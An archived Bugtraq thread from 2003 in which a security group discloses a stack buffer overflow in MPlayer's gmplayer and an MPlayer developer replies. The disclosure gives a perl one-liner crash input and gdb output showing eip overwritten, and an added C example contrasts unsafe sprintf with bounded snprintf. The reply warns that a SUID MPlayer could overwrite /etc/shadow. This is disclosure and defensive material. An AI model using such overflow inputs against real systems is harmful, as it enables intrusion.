10626797 2003-08-31 20:37 +0000 /115 lines/ CoKi <coki@interlap.com.ar>
Imported: 2003-09-02 19:51 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <28765>
Subject: Stack Buffer Overflow in MPlayer
------------------------------------------------------------
From: CoKi <coki@interlap.com.ar>
To: bugtraq@securityfocus.com
Message-ID: <20030831203745.25261.qmail@sf-www2-symnsj.securityfocus.com>



-------------------------------------------------
No System Group - Advisory #2 - 01/09/03
-------------------------------------------------
Program:  MPlayer - The Movie Player for Linux 
Homepage:  http://www.mplayerhq.hu
Vulnerable Versions: Mplayer v0.91 and prior
Risk: Low / Medium
Impact: Stack Buffer Overflow
-------------------------------------------------


- DESCRIPTION
-------------------------------------------------
MPlayer is a movie player for LINUX (runs on many
other Unices, and non-x86 CPUs, see the documentation).
It plays most MPEG, VOB, AVI, OGG/OGM, VIVO, ASF/WMA/WMV,
QT/MOV/MP4, FLI, RM, NuppelVideo, YUV4MPEG, FILM, RoQ, PVA
files, supported by many native, XAnim, and Win32 DLL codecs.

More information at: http://www.mplayerhq.hu


- DETAILS
-------------------------------------------------
bash-2.05b$ gmplayer `perl -e 'print "A" x 550'`
Using GNU internationalization
Original domain: messages
Original dirname: /usr/share/locale
Current domain: mplayer
Current dirname: /usr/local/share/locale

Playing
'/home/coki/AAAAAAAAAAAAAAAAAAAAAAA....AAAAAA'
File not found:
'/home/coki/AAAAAAAAAAAAAAAAAAAAAAA....AAAAAA'

MPlayer interrupted by signal 11 in module: unknown
- MPlayer crashed by bad usage of CPU/FPU/RAM.
  Recompile MPlayer with --enable-debug and make a 'gdb' backtrace and
  disassembly. For details, see DOCS/bugreports.html#crash.b.
- MPlayer crashed. This shouldn't happen.
  It can be a bug in the MPlayer code _or_ in your drivers _or_ in your gcc
  version. If you think it's MPlayer's fault, please read DOCS/bugreports.html
  and follow the instructions there. We can't and won't help unless you provide
  this information when reporting a possible bug.

Now we proceed to open gdb to view what may have occurred.

$ gdb gmplayer
GNU gdb 5.3
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-slackware-linux"...
(no debugging symbols found)...
(gdb) r `perl -e 'print "A" x 550'`
Starting program: /usr/local/bin/gmplayer `perl -e 'print "A" x 550'`
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...[New Thread 16384 (LWP 2044)]
Using GNU internationalization
Original domain: messages
Original dirname: /usr/share/locale
Current domain: mplayer
Current dirname: /usr/local/share/locale


MPlayer 0.90rc5-3.2.2 (C) 2000-2003 Arpad Gereoffy (see DOCS)

Playing
'/home/coki/AAAAAAAAAAAAAAAAAAAAAAA....AAAAAA'
File not found:
'/home/coki/AAAAAAAAAAAAAAAAAAAAAAA....AAAAAA'

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 16384 (LWP 2044)]
0x41414141 in ?? ()
(gdb) i r ebp eip esp
ebp            0x41414141       0x41414141
eip            0x41414141       0x41414141
esp            0xbfffd0b0       0xbfffd0b0
(gdb) 

Tested in Slackware Linux 9.0

NOTE: The program 'gmplayer' isn't SUID by default.


- SOLUTIONS
-------------------------------------------------
Update the program to latest version


- REFERENCES
-------------------------------------------------
http://www.nosystem.com.ar/advisories/advisory-02.txt


- CREDITS
-------------------------------------------------
Discovered by CoKi <coki@interlap.com.ar>

No System Group - http://www.nosystem.com.ar
(10626797) /CoKi <coki@interlap.com.ar>/--(Rewrapped)
Comment in text 10674219 by <gabucino@mplayerhq.hu>
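The crash pattern the advisory shows (a relative filename argument prefixed with the current directory, then ebp and eip both reading 0x41414141) beside the bounds-checked form that rejects oversized input, as an added C example that is not part of the original post or of MPlayer's source; PATH_BUF, the directory "/home/coki" and the function names are assumed for illustration:

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical reconstruction, not MPlayer's code. The advisory shows the
 * player turning a relative filename into "/home/coki/<name>" before it
 * dies, with ebp and eip both 0x41414141: a fixed-size stack buffer filled
 * past its end by the argument. PATH_BUF and the directory are sample values. */
#define PATH_BUF 256

/* Unsafe pattern: sprintf writes strlen(dir) + strlen(name) + 2 bytes no
 * matter how big buf is. Shown for contrast only; nothing here calls it. */
void unsafe_join(char *buf, const char *dir, const char *name)
{
    sprintf(buf, "%s/%s", dir, name);
}

/* Hardened pattern: snprintf bounds the write and returns the length the
 * full result needs; truncation is treated as an error rather than playing
 * a mangled path. Returns 0 on success, -1 if it would not fit (out = ""). */
int safe_join(char *out, size_t outlen, const char *dir, const char *name)
{
    int n;
    if (outlen == 0) return -1;
    n = snprintf(out, outlen, "%s/%s", dir, name);
    if (n < 0 || (size_t)n >= outlen) {
        out[0] = '\0';
        return -1;
    }
    return 0;
}

/* Build a name of `len` 'A's, as the advisory's perl one-liner does, and
 * report whether safe_join accepts it into a PATH_BUF-sized buffer. */
int name_of_length_accepted(size_t len)
{
    char name[1024];
    char out[PATH_BUF];
    if (len >= sizeof name) return 0;
    memset(name, 'A', len);
    name[len] = '\0';
    return safe_join(out, sizeof out, "/home/coki", name) == 0;
}

/* Joined path for the advisory's directory and a short name (static buffer). */
const char *join_short(const char *name)
{
    static char out[PATH_BUF];
    if (safe_join(out, sizeof out, "/home/coki", name) != 0) return "";
    return out;
}
```

With a 10-byte directory, a 244-byte name is the longest that fits in 256 bytes (directory, slash, name, NUL); the advisory's 550-byte name is rejected instead of overwriting the saved frame pointer and return address.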
10674219 2003-09-11 10:06 +0200 /24 lines/ <gabucino@mplayerhq.hu>
Imported: 2003-09-11 18:39 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <28965>
Comment on text 10626797 by CoKi <coki@interlap.com.ar>
Subject: Re: Stack Buffer Overflow in MPlayer
------------------------------------------------------------
From: <gabucino@mplayerhq.hu>
To: bugtraq@securityfocus.com
Message-ID: <20030911080636.GA900@woodstock.localdomain>

CoKi wrote:
> -------------------------------------------------
> No System Group - Advisory #2 - 01/09/03
> -------------------------------------------------
> Program:  MPlayer - The Movie Player for Linux 
> Homepage:  http://www.mplayerhq.hu
> Vulnerable Versions: Mplayer v0.91 and prior
> Risk: Low / Medium
> Impact: Stack Buffer Overflow
> -------------------------------------------------
> 
> NOTE: The program 'gmplayer' isn't SUID by default.
A SUID MPlayer can be easily tricked to - like - overwrite /etc/shadow with
a new one, using very simple commandline options. One should *NEVER* set
MPlayer SUID root.

-- 
Gabucino
MPlayer Core Team
(10674219) /<gabucino@mplayerhq.hu>/----------------
Attachment (application/pgp-signature) in text 10674220
10674220 2003-09-11 10:06 +0200 /9 lines/ <gabucino@mplayerhq.hu>
Imported: 2003-09-11 18:39 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <28966>
Attachment (application/pgp-signature) to text 10674219
Subject: Attachment to: Re: Stack Buffer Overflow in MPlayer
------------------------------------------------------------
(10674220) /<gabucino@mplayerhq.hu>/----------------